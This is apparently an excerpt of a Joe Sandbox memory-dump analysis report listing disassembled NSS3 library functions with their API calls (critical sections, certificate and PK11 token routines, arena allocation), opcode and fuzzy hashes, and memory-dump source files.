Similarity

API ID: Value$calloc$CriticalEnterLockSectionUnlock$Arena$AllocateInitPoolmemset
String ID:
API String ID: 3394263606-0
Opcode ID: 9ea67719db040c3339dd1a092b40026f33532db08f98b453afd983175a4bfce2
Instruction ID: 55346b9e0df084bc82f1975b4f9a21bcd27cfd1d49ab0f02afc30364d997c9a2
Opcode Fuzzy Hash: 9ea67719db040c3339dd1a092b40026f33532db08f98b453afd983175a4bfce2
Instruction Fuzzy Hash: B25172B4A04706DFDB00EF69C89465ABFF0BF55358F158969D858ABB10DB30E844CB91

Function 6C6B9EA0 Relevance: 12.1, APIs: 8, Instructions: 136COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 6C6B9EC0
EnterCriticalSection.KERNEL32(?), ref: 6C6B9EF9
_PR_MD_UNLOCK.NSS3(?), ref: 6C6B9F73
EnterCriticalSection.KERNEL32(?), ref: 6C6B9FA5
_PR_MD_NOTIFY_CV.NSS3(-00000074), ref: 6C6B9FCF
_PR_MD_UNLOCK.NSS3(?), ref: 6C6B9FF2
_PR_MD_UNLOCK.NSS3(?), ref: 6C6BA01D

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterSection
String ID:
API String ID: 1904992153-0
Opcode ID: f3803e78985fb4697620a314b44d156b759342ec3df78c74381ddb28840879fc
Instruction ID: a06c48948acef8704b149bdf53e7507f52924f8963ff74cbfa450854e3ac2be0
Opcode Fuzzy Hash: f3803e78985fb4697620a314b44d156b759342ec3df78c74381ddb28840879fc
Instruction Fuzzy Hash: E451B1B2800600DBCB209F26D48468AB7F4FF1531CF158569DC5967F12E731E895CB9A

Function 6C5ADCE0 Relevance: 12.1, APIs: 8, Instructions: 90stringCOMMON

Download Yara Rule

APIs

PR_Now.NSS3 ref: 6C5ADCFA

Part of subcall function 6C669DB0: GetSystemTime.KERNEL32(?,?,?,?,00000001,00000000,?,6C6B0A27), ref: 6C669DC6
Part of subcall function 6C669DB0: SystemTimeToFileTime.KERNEL32(?,?,?,?,?,00000001,00000000,?,6C6B0A27), ref: 6C669DD1
Part of subcall function 6C669DB0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6C669DED

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6C5ADD40
CERT_FindCertIssuer.NSS3(?,?,?,?), ref: 6C5ADD62
CERT_DestroyCertificate.NSS3(?), ref: 6C5ADD71
CERT_DestroyCertificate.NSS3(00000000), ref: 6C5ADD81
CERT_RemoveCertListNode.NSS3(?), ref: 6C5ADD8F

Part of subcall function 6C5C06A0: TlsGetValue.KERNEL32 ref: 6C5C06C2
Part of subcall function 6C5C06A0: EnterCriticalSection.KERNEL32(?), ref: 6C5C06D6
Part of subcall function 6C5C06A0: PR_Unlock.NSS3 ref: 6C5C06EB

CERT_DestroyCertificate.NSS3(?), ref: 6C5ADD9E
CERT_DestroyCertificate.NSS3(?), ref: 6C5ADDB7

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CertificateDestroy$Time$CertSystem$CriticalEnterFileFindIssuerListNodeRemoveSectionUnlockUnothrow_t@std@@@Value__ehfuncinfo$??2@strcmp
String ID:
API String ID: 653623313-0
Opcode ID: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction ID: 3f88037778a0471e443844dcabde4fac64d70294ae52d70788e303da06809fee
Opcode Fuzzy Hash: 5cd1e4dda6c1f4cf8b67a259948b155a30ce1e8299e7f18c14593722b5766ec0
Instruction Fuzzy Hash: BF218EB6E011299BDB01AEE6DC4199EB7B4AF49318B140424EC18A7711F732ED16CBE2

Function 6C635F60 Relevance: 12.1, APIs: 8, Instructions: 64COMMON

Download Yara Rule

APIs

PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C63AADB,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635F72

Part of subcall function 6C59ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C59ED8F
Part of subcall function 6C59ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C59ED9E
Part of subcall function 6C59ED70: DeleteCriticalSection.KERNEL32(?), ref: 6C59EDA4

PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C63AADB,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635F8F
DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C63AADB,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635FCC
free.MOZGLUE(?,?,6C63AADB,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635FD3
DeleteCriticalSection.KERNEL32(00000001,00000000,00000000,?,6C63AADB,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635FF4
free.MOZGLUE(?,?,6C63AADB,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C635FFB
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C63AADB,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C636019
PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6C63AADB,?,?,?,?,?,?,?,?,00000000,?,6C6380C1), ref: 6C636036

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalDeleteSection$DestroyMonitor$free
String ID:
API String ID: 227462623-0
Opcode ID: 0da901879d0c1782432b7bcba4afe73c0b336fc0f6ceab3180c8b4f3f65f65dd
Instruction ID: b882012fed6bf591d1d21534a01dfda5fdc2df58eed261c8b8ebcccd0fb04371
Opcode Fuzzy Hash: 0da901879d0c1782432b7bcba4afe73c0b336fc0f6ceab3180c8b4f3f65f65dd
Instruction Fuzzy Hash: F62138F1604B40ABEB209F75AC48BD376A8BB41708F14182CE46E87640EB76F419CBD5

Function 6C5A3C90 Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(?,?,?,?,6C61460B,?,?), ref: 6C5A3CA9
EnterCriticalSection.KERNEL32(?), ref: 6C5A3CB9
PL_HashTableLookup.NSS3(?), ref: 6C5A3CC9
SECITEM_DupItem_Util.NSS3(00000000), ref: 6C5A3CD6
PR_Unlock.NSS3 ref: 6C5A3CE6
CERT_FindCertByDERCert.NSS3(?,00000000), ref: 6C5A3CF6
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5A3D03
PR_Unlock.NSS3 ref: 6C5A3D15

Part of subcall function 6C64DD70: TlsGetValue.KERNEL32 ref: 6C64DD8C
Part of subcall function 6C64DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DDB4

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CertCriticalItem_SectionUnlockUtilValue$EnterFindHashLeaveLookupTableZfree
String ID:
API String ID: 1376842649-0
Opcode ID: 1727b34826c23fc70677f7f76ed06021fd3598228e90ef9766dab0ce46b113d5
Instruction ID: 5d0b7633bcd0b89c741b36b4711cfe8a059c1c7158f220971d98f1e1572575c1
Opcode Fuzzy Hash: 1727b34826c23fc70677f7f76ed06021fd3598228e90ef9766dab0ce46b113d5
Instruction Fuzzy Hash: 92110ABAF00204F7DB012765EC458AA3B79EB4225CF148135ED1883B11FB21DC59C7D1

Function 6C5A9C50 Relevance: 10.8, APIs: 7, Instructions: 253stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5C11C0: PR_NewLock.NSS3 ref: 6C5C1216

free.MOZGLUE(?), ref: 6C5A9E17
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5A9E25
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5A9E4E
TlsGetValue.KERNEL32 ref: 6C5A9EA2

Part of subcall function 6C5B9500: memcpy.VCRUNTIME140(00000000,?,00000000,?,?), ref: 6C5B9546

EnterCriticalSection.KERNEL32(?), ref: 6C5A9EB6
PR_Unlock.NSS3 ref: 6C5A9ED9
PR_SetError.NSS3(FFFFE08A,00000000), ref: 6C5A9F18

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: strlen$CriticalEnterErrorLockSectionUnlockValuefreememcpy
String ID:
API String ID: 3381623595-0
Opcode ID: 3f5ab2d852af29eb4caab83331b2f6182de3c41c506be4973dd320847d458f6f
Instruction ID: 43d6ce058538c60460a33195d5b052f482ab6bd050b5c451737a0c5b66fd6169
Opcode Fuzzy Hash: 3f5ab2d852af29eb4caab83331b2f6182de3c41c506be4973dd320847d458f6f
Instruction Fuzzy Hash: AF813AB5A00611ABE700DF75DC40AAFBBA9BF95248F04452CEC4587B42FB32EC55C7A1

Function 6C5BDCB0 Relevance: 10.7, APIs: 7, Instructions: 245stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5BAB10: DeleteCriticalSection.KERNEL32(D958E852,6C5C1397,5B5F5EC0,?,?,6C5BB1EE,2404110F,?,?), ref: 6C5BAB3C
Part of subcall function 6C5BAB10: free.MOZGLUE(D958E836,?,6C5BB1EE,2404110F,?,?), ref: 6C5BAB49
Part of subcall function 6C5BAB10: DeleteCriticalSection.KERNEL32(5D5E6C7B), ref: 6C5BAB5C
Part of subcall function 6C5BAB10: free.MOZGLUE(5D5E6C6F), ref: 6C5BAB63
Part of subcall function 6C5BAB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C5BAB6F
Part of subcall function 6C5BAB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C5BAB76

TlsGetValue.KERNEL32 ref: 6C5BDCFA
EnterCriticalSection.KERNEL32(00000000), ref: 6C5BDD0E
PK11_IsFriendly.NSS3(?), ref: 6C5BDD73
PK11_IsLoggedIn.NSS3(?,00000000), ref: 6C5BDD8B
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C5BDE81
memcpy.VCRUNTIME140(00000000,?,?), ref: 6C5BDEA6
PR_Unlock.NSS3(?), ref: 6C5BDF08

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSection$Deletefree$K11_$EnterFriendlyLoggedUnlockValuememcpystrlen
String ID:
API String ID: 519503562-0
Opcode ID: fe585931a602beed7e519201205b0ffacb62a31567de022b181ccf12dbf9a4dc
Instruction ID: 102a6f6d8c93239d7a747dbdea014a10f95021b91bfdfb091fc5fe79f9d19e99
Opcode Fuzzy Hash: fe585931a602beed7e519201205b0ffacb62a31567de022b181ccf12dbf9a4dc
Instruction Fuzzy Hash: 8E91B3B5A001059FDB00CF68CCA1BAABFB5FF54308F148429ED19AB745E731E955CB92

Function 6C575FC0 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,000293F4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,6C65BB62,00000004,6C6C4CA4,?,?,00000000,?,?,6C5331DB), ref: 6C5760AB
sqlite3_config.NSS3(00000004,6C6C4CA4,6C65BB62,00000004,6C6C4CA4,?,?,00000000,?,?,6C5331DB), ref: 6C5760EB
sqlite3_config.NSS3(00000012,6C6C4CC4,?,?,6C65BB62,00000004,6C6C4CA4,?,?,00000000,?,?,6C5331DB), ref: 6C576122

Strings

%s at line %d of [%.10s], xrefs: 6C5760A4
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C576095
misuse, xrefs: 6C57609F

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_config$sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse
API String ID: 1634735548-648709467
Opcode ID: d6ed134730494dce77896e9d51a0da1d7cc31a3243f5b22365d5e01c1bad7f12
Instruction ID: 058a86e89faa3bf4cb8f3cb7bce89f73d5bda64c8af84771cc3b225136858391
Opcode Fuzzy Hash: d6ed134730494dce77896e9d51a0da1d7cc31a3243f5b22365d5e01c1bad7f12
Instruction Fuzzy Hash: 0AB17274E04746CFCB04CF59D6849A9BBF1FB1E304F018559D519AB322DB30AA94CFAA

Function 6C524F60 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 211stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C524FC4
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,0002996C,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C5251BB

Strings

%s at line %d of [%.10s], xrefs: 6C5251B4
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C5251A5
misuse, xrefs: 6C5251AF
unable to delete/modify user-function due to active statements, xrefs: 6C5251DF

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_logstrlen
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$misuse$unable to delete/modify user-function due to active statements
API String ID: 3619038524-4115156624
Opcode ID: c6525193d5744f3cfb57578c6f12aa99a68122ca96a4afc66f8c304e6b9a6fd1
Instruction ID: 7b5480a7db7041373d8d13ad70c372d14369b1084143cc18258abd80168b1d5f
Opcode Fuzzy Hash: c6525193d5744f3cfb57578c6f12aa99a68122ca96a4afc66f8c304e6b9a6fd1
Instruction Fuzzy Hash: 6E718CB1A0420A9BEB00CE55CCC0B9AB7F5BF88308F554524FD199BB89D739ED51CBA1

Function 6C60FF10 Relevance: 10.7, APIs: 7, Instructions: 164memoryCOMMON

Download Yara Rule

APIs

PORT_NewArena_Util.NSS3(00000400,?,?,00000000,00000000,?,6C60F165,?), ref: 6C60FF4B
PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,00000000,00000000,?,6C60F165,?), ref: 6C60FF6F
memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C60F165,?), ref: 6C60FF81
PORT_ArenaAlloc_Util.NSS3(00000000,-000000F8,?,?,?,?,?,00000000,00000000,?,6C60F165,?), ref: 6C60FF8D
memset.VCRUNTIME140(00000000,00000000,-000000F8,?,?,?,?,?,?,?,00000000,00000000,?,6C60F165,?), ref: 6C60FFA3
SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,6C60F165,6C6D219C,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C60FFC8
PORT_FreeArena_Util.NSS3(00000000,00000000,?,?,?,?,?,?,?,00000000,00000000,?,6C60F165,?), ref: 6C6100A6

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Alloc_ArenaArena_memset$EncodeFreeItem_
String ID:
API String ID: 204871323-0
Opcode ID: ca2fa04a09369f2fdf9a6f7a8b88c95b191e13e16cf5dd8ddf39218f57c6a749
Instruction ID: e2e5704d58415acf9820125bcbf711dbdc5e9340b5dda53d8d21d52db4d63a30
Opcode Fuzzy Hash: ca2fa04a09369f2fdf9a6f7a8b88c95b191e13e16cf5dd8ddf39218f57c6a749
Instruction Fuzzy Hash: AD510475E082559FDF148E5CC8807AEB7B5BB4931AF254229DC59B7B40D332AC20CBD9

Function 6C5CDEF0 Relevance: 10.7, APIs: 7, Instructions: 159COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5CDF37
EnterCriticalSection.KERNEL32(?), ref: 6C5CDF4B
PR_SetError.NSS3(FFFFE005,00000000), ref: 6C5CDF96
PR_SetError.NSS3(00000000,00000000), ref: 6C5CE02B
PR_Unlock.NSS3(?), ref: 6C5CE07E
PR_SetError.NSS3(FFFFE001,00000000), ref: 6C5CE090
PR_Unlock.NSS3(?), ref: 6C5CE0AF

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Error$Unlock$CriticalEnterSectionValue
String ID:
API String ID: 4073542275-0
Opcode ID: 4537f4c9af753d228240db55f0660875d1fbc15ae8b854d8473680e1729c9fb7
Instruction ID: 50f21a86a0f4f8d07c48ed38409ac9efd4356ac0d11ecd5739c5a4ad02d75e6b
Opcode Fuzzy Hash: 4537f4c9af753d228240db55f0660875d1fbc15ae8b854d8473680e1729c9fb7
Instruction Fuzzy Hash: 7051CC70B00600DBEB20DEA8DC86B5673B5FB45308F20492CE85A97B91D7B1E848CBD3

Function 6C5CBCF0 Relevance: 10.6, APIs: 7, Instructions: 142memoryCOMMON

Download Yara Rule

APIs

CERT_NewCertList.NSS3 ref: 6C5CBD1E

Part of subcall function 6C5A2F00: PORT_NewArena_Util.NSS3(00000800), ref: 6C5A2F0A
Part of subcall function 6C5A2F00: PORT_ArenaAlloc_Util.NSS3(00000000,0000000C), ref: 6C5A2F1D

Part of subcall function 6C5E57D0: PK11_GetAllTokens.NSS3(000000FF,00000000,00000000,6C5AB41E,00000000,00000000,?,00000000,?,6C5AB41E,00000000,00000000,00000001,?), ref: 6C5E57E0
Part of subcall function 6C5E57D0: free.MOZGLUE(00000000,00000000,00000000,00000001,?), ref: 6C5E5843

SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5CBD8C

Part of subcall function 6C5FFAB0: free.MOZGLUE(?,-00000001,?,?,6C59F673,00000000,00000000), ref: 6C5FFAC7

CERT_DestroyCertList.NSS3(00000000), ref: 6C5CBD9B
SECITEM_AllocItem_Util.NSS3(00000000,00000000,00000008), ref: 6C5CBDA9
SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5CBE3A

Part of subcall function 6C5A3E60: PL_InitArenaPool.NSS3(?,security,00000800,00000008,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C5A3EC2
Part of subcall function 6C5A3E60: SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6C5A3ED6
Part of subcall function 6C5A3E60: SECITEM_CopyItem_Util.NSS3(00000000,?,?), ref: 6C5A3EEE
Part of subcall function 6C5A3E60: PR_CallOnce.NSS3(6C702AA4,6C6012D0), ref: 6C5A3F02
Part of subcall function 6C5A3E60: PL_FreeArenaPool.NSS3 ref: 6C5A3F14
Part of subcall function 6C5A3E60: SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C5A3F27

SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C5CBE52

Part of subcall function 6C5A2E00: SECITEM_DupItem_Util.NSS3(-0000003C,00000000,00000000,?,?,?,6C5A2CDA,?,00000000), ref: 6C5A2E1E
Part of subcall function 6C5A2E00: SECITEM_DupItem_Util.NSS3(?), ref: 6C5A2E33
Part of subcall function 6C5A2E00: TlsGetValue.KERNEL32 ref: 6C5A2E4E
Part of subcall function 6C5A2E00: EnterCriticalSection.KERNEL32(?), ref: 6C5A2E5E
Part of subcall function 6C5A2E00: PL_HashTableLookup.NSS3(?), ref: 6C5A2E71
Part of subcall function 6C5A2E00: PL_HashTableRemove.NSS3(?), ref: 6C5A2E84
Part of subcall function 6C5A2E00: PL_HashTableAdd.NSS3(?,00000000), ref: 6C5A2E96
Part of subcall function 6C5A2E00: PR_Unlock.NSS3 ref: 6C5A2EA9

PR_SetError.NSS3(FFFFE013,00000000), ref: 6C5CBE61

Memory Dump Source

Source File: 00000000.00000002.2140414389.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2140329183.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140781803.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140841831.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140882896.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140948597.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2140980135.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Item_$Zfree$ArenaHashTable$CertListPoolfree$AllocAlloc_Arena_CallCopyCriticalDecodeDestroyEnterErrorFreeInitK11_LookupOnceQuickRemoveSectionTokensUnlockValue
String ID:
API String ID: 2178860483-0
Opcode ID: ed18298941303ad518d65d8009dcca20a3575ac4581502c65dbd1658a2171d21
Instruction ID: db5e23c06650a48190cb5466075eda465423e6aea6f6242f6b612a2e5736e683
Opcode Fuzzy Hash: ed18298941303ad518d65d8009dcca20a3575ac4581502c65dbd1658a2171d21
Instruction Fuzzy Hash: E641C1B6A00210ABC710DFA9DC80B6A77E4EB89718F10456CF95997B11E731ED15CB93

Function 6C5EAC10 Relevance: 10.6, APIs: 7, Instructions: 121memoryCOMMON

Download Yara Rule

APIs

PK11_CreateContextBySymKey.NSS3(00000133,00000105,00000000,?,?,6C5EAB3E,?,?,?), ref: 6C5EAC35

Part of subcall function 6C5CCEC0: PK11_FreeSymKey.NSS3(00000000), ref: 6C5CCF16

PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C5EAB3E,?,?,?), ref: 6C5EAC55

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
